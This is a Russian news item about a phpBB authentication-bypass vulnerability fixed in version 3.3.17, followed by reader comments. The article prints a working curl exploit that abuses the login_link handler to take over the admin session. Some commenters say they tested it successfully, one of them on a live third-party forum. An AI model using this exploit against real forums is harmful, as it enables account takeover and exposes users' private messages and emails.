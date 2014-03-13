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Уязвимость в phpBB, позволяющая получить доступ к любому аккаунту без аутентификации

11.06.2026 22:43 (MSK)

В свободном движке для создания форумов phpBB выявлена уязвимость, позволяющая через отправку одного HTTP-запроса подключиться к сеансу любого пользователя форума. Уязвимость проявляется в конфигурации phpBB по умолчанию. Проблема устранена в версии phpBB 3.3.17.

При атаке на обычных пользователей можно получить доступ к приватной переписке и возможности отправлять сообщения от имени пользователя. При атаке на модераторов и администраторов можно удалять чужие сообщения и читать приватную переписку, но нельзя зайти в интерфейс администратора и получить доступ к хосту.

Детали об уязвимости не приводятся, но при помощи AI на основе исправления уже воссоздан метод эксплуатации, основанный на обращении к обработчику "login_link" с выставлением метода аутентификации "auth_provider=apache" и подстановкой логина через Basic Auth, после чего PHP выставит переменную окружения "PHP_AUTH_USER=логин", а phpBB извлечёт из неё логин пользователя без проверки пароля. Например, для получения идентификатора сессии пользователя admin и сохранения его в файл cookies.txt можно выполнить код: 


   curl -i -s \
     -c cookies.txt \
     -b cookies.txt \
     -u 'admin:anything' \
     -d 'login=Login&login_username=admin&login_password=anything' \
     'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'


  1. Главная ссылка к новости (https://www.aikido.dev/blog/ph...)
  2. OpenNews: Уязвимость в движке для создания форумов phpBB
  3. OpenNews: Инфраструктура свободного проекта phpBB подверглась взлому
  4. OpenNews: Взломан сайт проекта phpBB, захвачено 400 тыс. аккаунтов пользователей
Лицензия: CC BY 3.0
Наводку на новость прислал Аноним
Короткая ссылка: https://opennet.ru/65667-phpbb
Ключевые слова: phpbb
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (7) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 22:55, 11/06/2026 [ответить]  
    		• +1 +/
    Ух что сейчас будет с форумами.. Блин, надеюсь архивы есть. Пингуйте всех админов срочно, столько ценных данных потерять можем. Я проверил, реально работает, и это реально пи****. Можно залогиниться под админом. В админку зайти НЕЛЬЗЯ (т.к. phpBB спрашивает пароль ещё раз), но в модераторскую панель можно, и там можно много чего. Логи модерации, IPшки. Можно смотреть адреса почты всех юзеров. Можно логиниться всеми юзерами и скрапить ЛС.
     
     
  • 2.5, Аноним (5), 23:19, 11/06/2026 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Проблемы форумного быдла.

    я аноним и нигде не логинился никогда. Уязвимости не полвержен. Берите с меня пример!

     
  • 2.7, Аноним (7), 23:23, 11/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > в модераторскую панель можно, и там можно много чего. Логи модерации, IPшки. Можно смотреть адреса почты всех юзеров. Можно логиниться всеми юзерами и скрапить ЛС.

    Ой, я вас умоляю. В том и плюс классических форумов, что кроме адреса почты там ничего ценного не наскрапишь, ибо не реального имени, ни номера телефона и т.п. они не требуют.

     

  • 1.2, Аноним (2), 22:57, 11/06/2026 [ответить]  
    		• +1 +/
    Лол, а норм что на Linux Mint форуме это работает?))

    https://forums.linuxmint.com/viewtopic.php?p=1430678#p1430678 послание внизу оставил

     
  • 1.3, Аноним (3), 22:58, 11/06/2026 [ответить]  
    		• +/
    Неплохо ИИ-чан, теперь найди подобное в опеннет.
     
  • 1.4, Аноним (4), 23:12, 11/06/2026 Скрыто ботом-модератором     [к модератору]
    		• +/
     
  • 1.6, YetAnotherOnanym (ok), 23:21, 11/06/2026 [ответить]  
    		• +/
    Не те нынче пыхеры, эх, не те... В былые времена под самой новостью и под каждым комментарием висело бы по десять ответов "а зато на пхп можно делать сайты быстро!!!11"
     

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